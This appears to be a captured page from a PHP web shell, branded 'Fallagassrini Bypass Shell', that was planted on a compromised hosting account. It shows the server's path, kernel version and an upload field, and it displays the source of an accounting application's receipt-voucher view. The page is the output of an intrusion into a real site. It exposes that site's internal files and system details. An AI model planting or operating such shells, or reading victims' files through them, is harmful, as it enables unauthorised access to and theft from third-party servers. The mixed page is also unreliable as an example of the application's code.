? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/oscarerp.com/application/views/accounting/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/oscarerp.com/application/views/accounting/view_receipt_voucher.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>

<div class="icons_main">
    <div class="icons">
        <img src="<?= base_url() ?>assets/images/add.png" title="Add New" class="" onclick="addformdisplay('add_receipt_voucher', 'accounting')" alt="Add New" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Un-Posted Receipt Voucher details</h4>
    </div>
</div>
<div class="clean"></div> 
<div class="grid_12">
    <div class="box">
        <div class="header">     
        </div>
        <div class="content no-padding"> 
            <table  class="table">
                <tr>
                    <th><input type="radio" name="unposted" id="sg1" value="2" onchange="viewdata('accounting', 'viewinaccountingsearch', 'search_receipt_voucher_posted', 'view_receipt_voucher_posted', '1')"></th><th><label>Posted Receipt Voucher</label></th>
                    <th><input type="radio" name="unposted" id="cr1" value="3" checked="" onchange="viewdata('accounting', 'viewinaccountingsearch', 'search_receipt_voucher', 'view_receipt_voucher', '1')"></th><th><label>Unposted Receipt Voucher</label></th>
                </tr>
            </table>
        </div>
    </div>
</div>

<div class="grid_12">
    <div class="box">
        <div class="header">     
        </div>
        <div class="content">
            <table id="table-example" class="table">
                <thead>
                    <tr>
                        <th id="sl">Sl No</th>
                        <th>Transaction No</th>                              
                        <th>Account code</th>
                        <th>Account Name</th>                            
                        <th>Credit</th>
                        <th>Date</th>                     
                        <th>Action</th>
                    </tr>
                </thead>
                <tbody>
                <?php
                    $table = "";
                    $field = "";
                    $i = 0;
                    $code = 0;
                    foreach ($viewinfo->result() as $row) {
                        $journal = $this->mastermodel->get_data_dual('finance_journal', $row->journal_id, 'journal_id', 0, 'debit', 'journal_id');
                        $i++;
                        ?>
                        <tr>
                            <td style="text-align: center;" ><?= $i ?></td>
                            <td><?= $row->reference ?></td>                          
                            <?php
                            $temp = 0;
                            if ($temp != $row->journal_id)
                                echo "<td>";

                            foreach ($journal as $value) {
                                echo '<p class="fixed_p">' . $value['chart_account_code'] . '</p>';
                            }
                            if ($temp != $row->journal_id)
                                echo "</td>";

                            if ($temp != $row->journal_id)
                                echo "<td>";

                            foreach ($journal as $value) {
                                echo '<p class="fixed_p">' . $this->mastermodel->get_single_field_value('finance_chart_master', 'chart_account_name', 'chart_account_code', $value['chart_account_code']) . '</p>';
                            }
                            if ($temp != $row->journal_id)
                                echo "</td>";

                            if ($temp != $row->journal_id)
                                echo "<td>";

                            foreach ($journal as $value) {
                                echo '<p class="fixed_p text_r">' . number_format((double)$value['credit'],2) . '</p>';
                            }
                            if ($temp != $row->journal_id)
                                echo "</td>";
                            $temp = $row->journal_id;
                            ?>
                            <td><?= $this->mastermodel->convertdatenormalformat($row->journal_date) ?></td>
                            <td id="actions_3"> 

                                <img src="<?= base_url() ?>/assets/images/view-icon.png" id="editclass"   title="View" width="20" height="20" alt="View Entry" align = "center" onclick="viewthis_unpost(<?= $row->journal_id ?>, 'search_receipt_voucher', 'view_receipt_voucher')" style="cursor: pointer" class="clickimage1"  />&nbsp;&nbsp;
                            <?php
                            if ($row->posted == 0) {
                                ?>

                                    <img src="<?= base_url() ?>assets/images/edit-icon.gif"  title="Edit" width="20" height="20" alt="Edit" align = "center" class="clickimage" onclick="editformdata('accounting', 'edit_receipt_voucher', '<?= $row->journal_id; ?>', 'finance_journal_refs', 'journal_id', 'edit_receipt_voucher')" alt="" />   &nbsp;&nbsp;&nbsp;
                                    <?php
                                }
                                ?>
                                <img src="<?= base_url() ?>assets/images/delete-icon.png"  title="Delete" width="20" height="20" onclick="deletedata('finance_journal_refs',<?= $row->journal_id; ?>, 'journal_id', 'accounting', 'viewinaccountingsearch', 'search_receipt_voucher', 'view_receipt_voucher', '<?= $table ?>', '<?= $field ?>')" alt="Delete" align = "center"/>                                                                                 

                            </td>
   
                        </tr> 
                            <?php
                            $code = $row->journal_id;
                        }
                        ?>
                </tbody>
            </table>
        </div>
    </div>
</div>
<div class="actions-left">
    <div style="display:none">
        <div id="empdiv"></div>
    </div>
</div>  

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net